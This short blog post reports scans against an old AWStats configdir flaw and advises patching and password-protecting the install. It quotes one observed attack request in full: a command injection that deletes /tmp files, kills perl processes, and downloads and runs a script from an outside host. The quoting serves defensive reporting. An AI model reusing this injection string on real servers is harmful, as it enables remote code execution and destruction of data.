Awstats exploits

SANS ISC highlighted awstats attacks today in the diary. I’m seeing the same sort of thing. Scans looking for

awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20http://geocities.com/ventor_team/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo|

I think that is a 9 month old awstats vuln. If you’re running it you should patch it, and password protect the directory it is installed in.